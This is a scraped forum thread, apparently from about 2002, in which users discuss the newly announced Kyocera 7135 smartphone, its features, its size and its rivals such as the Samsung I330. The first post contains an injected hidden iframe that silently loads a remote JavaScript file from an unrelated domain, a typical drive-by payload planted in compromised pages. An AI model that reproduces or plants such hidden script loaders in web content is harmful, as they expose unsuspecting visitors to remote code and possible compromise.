+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast
    Administrator

Arrow Kyocera 7135 smartphone announced.

Kyocera 7135 Official Announcement.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Oh my!!! I REALLLY hope Sprint carries this device because I want it!

Yeah, this looks like trouble. A few highlights are:
    expansion slot
    mp3 player
    portable keyboard
    GPS services????

Everything we've wanted in the I300/330. This'll be interesting.

WOW! This IS the next phone I will be buying. It is perfect. Does anyone have any other links to info/pics on this phone? A release date?! Lets get some info here!

This looks like the flip samsung phone thats been discussed in recent days.

Originally posted by tomas316
    Info on this device was actually leaked a week or so before we started discussing the Samsung Bluechip. Either way, Samsung is going to have to come up with a competitive price if they want to compete with this device. $500 for an I330, Bluechip, or a 7135...which would you buy? The 7135 with its jam-paked features gets my vote, no question about that.

I don´t want the i330 anymore, the KYO 7135 gets my vote,
    It have expansion slot ! and 65,535 colors !! in the half of the size of the i330!. . .

that phone looks like a winner, can't wait for it come out!!
    www.oasis-design.com

Napoleon Bonaparte Jr.

Talking Hello

Wait for the August month ....

G3 comes out and you,ll see in the stores 20 or 30

different smartphones .
    ................................................................................

The problem with me is : I really start looking for Pocket PC .

Palm its jast Palm . Even version 5 will comes out - it cannot

compare to Pocket PC . I hope in August we,ll get the real

Pocket PC what really working together with phone .

Count me in, too

Wow, count me in on the bandwagon as well .... It'd either be this, or the Treo (I like the keyboard) ... have to make up my mind once they're both out, but I can say it's definitely not the I330 now.

I really like what they said about the screen being visible even in the worst lighting conditions. That makes me very optimistic!

Sorry Samsung, your product is too little, too late. And your support (SDK) is completely non-existant.

-Doug

PHO
    Broward County Florida, "Home of the Hanging Chad"

Cool More Photos

I am sure that everyone signed up for email notification when the phone will be out, but if you didn't and you go to that page, there are more photos.

More photos/ Email notification

I am now very torn, I HATE flip phones i don't like the extra step, but this has sooo many more functions. Its going to depend on screen size for me i think. I first went and saw the Nokia for the first time in person, WHOAH is that thing a bohemath, its Freakin HUGE.

Anyway, i would hate to lose my soft graffiti area and my graffiti hack

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Hey Homer, got any info for us on this device?

The story on PDABuzz.com links to a Kyocera press release that states 4th quarter 2002 is when the phone is expected to become available !

Napoleon Bonaparte Jr.

Talking Hello

dtoombs

Sorry Samsung, your product is too little, too late. And your support (SDK) is completely non-existant.

-Doug
    --------------------------------------
    --------------------------------------

Its one of My reasons to switch to Pocket PC .

1) No SDK for our phone .
    2) No free updates or upgrages (we have to buy it).
    3) I330 comes out in august ( to late , lots of competition from
    big companies , like Microsoft and ...)
    4) I am sure I330 comes out with Palm OS 4 (I do not need it , to
    old OS for me ) .
    5) I am emigrant . Living 15 years in America . This is My Country .
    And all of my patriotic fillings telling to buy some thing from
    american products ( probably Microsoft ) , not only becouse
    I am studying for Microsoft system engeneer .
    6) I330 screen resolution still is not to good for competition with
    Pocket PC and not only ...

I love the flip phone design personally. Also, it looks like it has an LCD screen on the top of the unit (like the I300). Any confirmation on that? Also anyone seen more pics?!

We can also be much more sure that the Kyocera model will release an SDK (like they did for the 6035), where the I330 probably will not (like the I300 did not). The Kyocera seems to be the much better choice!

Originally posted by theminor
    I love the flip phone design personally. Also, it looks like it has an LCD screen on the top of the unit (like the I300). Any confirmation on that? Also anyone seen more pics?!
    Yes, the press release/announcement linked in the first post of this thread states that the device has an external top LCD, very similar in nature to that of the I300. If you visit that link I just referenced and click on the link to be emailed when the 7135 is available, there are some more pics.

to buy some thing from
    american products ( probably Microsoft ) , not only becouse
    I am studying for Microsoft system engeneer .
    :p :p :p

(Click a sponser today!)
    Check out the dimensions on that thing - it's no shirt pocket flip-phone. About an inch shorter (in folded position) than the i300, 0.15" wider and 0.35" thicker. And 16 grams heavier with standard battery.

Still, a VEEEERRRRY attractive package, tho'. Appears as tho' the mic will end somewhere near your mouth which can only help clarity.

Built-in screen protection with the clam-shell design, so can we start a new discussion on the best case??? (hee hee)
    Gary

smartphonecentral.com
    Originally posted by tomas316
    Actually, I believe it's the other way around...

This does look good. I particularly like the MP3 playback, because it would outright eliminate one of the devices I carry daily.

It'd be nice if they had a 160x240 screen, but I guess not having it (Kyocera) is basically the same as having it but not supporting it (Samsung).

Brooks... kyocera7135.com?

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

PalmVenue Guy
    " to buy some thing from american products ( probably Microsoft ) , not only becouse I am studying for Microsoft system engeneer "

sprint, FYI, the Kyocera is made in America, and I would not switch to M$ if I were you--the OS is not as stable as Palm's OS, and with OS 5.0 the multimedia capabilities will be matched to M$.

Just my two cents. Microsoft rules the PC industry, and I like most of their products for the PC, but Palm dominates the handheld industry b/c its OS was made for the handheld industry (where MS tried to make the handheld industry fit into its OS).

Exclamation My two cents...

Well....

By the run-down given by Kyocera on this phone and givin the fact that the Samsung Bluechip will most likely be on par with it, I really do see the I330 as a waste to consumers, especially to us, users of the I300. Believe me, I have had my phone since last November and have loved it everyday (barring a replacement due to that damn ring-around the screen issue) and I have recently bought the TT-Tec keyboard and love that as well.

BUT I must say I would advise everyone to give a long hard thought to paying another $350- $500 (for those of us who have hook-ups) for a somewhat 1 1/2 generation smartphone. I mean what does the I330 offer us?, a not much better design, 8 more megs of mem. I mean I cant think of much more (same crappy screen), and we will not see a difference between OS 3.5 and 4.1. I mean it is kinda of annoying that Samsung is doing almost the same half-a** job on the I330 as they did on the I300. They pretty much got all of our money, with no product support, no accesories, no SDK and I can bet anything that the I330 will be kicked to the curb within 4-6 months of release and probably less as our phone was.

Granted that the I300 still is the best on the market, but when you have a far superior product on its way from a competitor and Samsung has something similiar in the works as well, It kinda shows you the direction of the market. With smartphones on the verizon from so many manufactures, 3G yet to hit us, I just think as educated consumers we must wait at least for the real second generation of the smartphones to come out, because I cannot speak for anyone else but I definitely cannot go back to a seperate Palm and phone again. We have to show these companies that they cannot use us as guinne pigs to test out the market on inferior products or to recoop on wasted R&D expense, which essentially what the I330 will be.

I know I have said alot but I just want my fellow users of the this great product to wait and make an educated purchase into what will most likely be one of the hottest electronics market for years to come.

Steve a.k.a. Superman a.k.a. Kal-El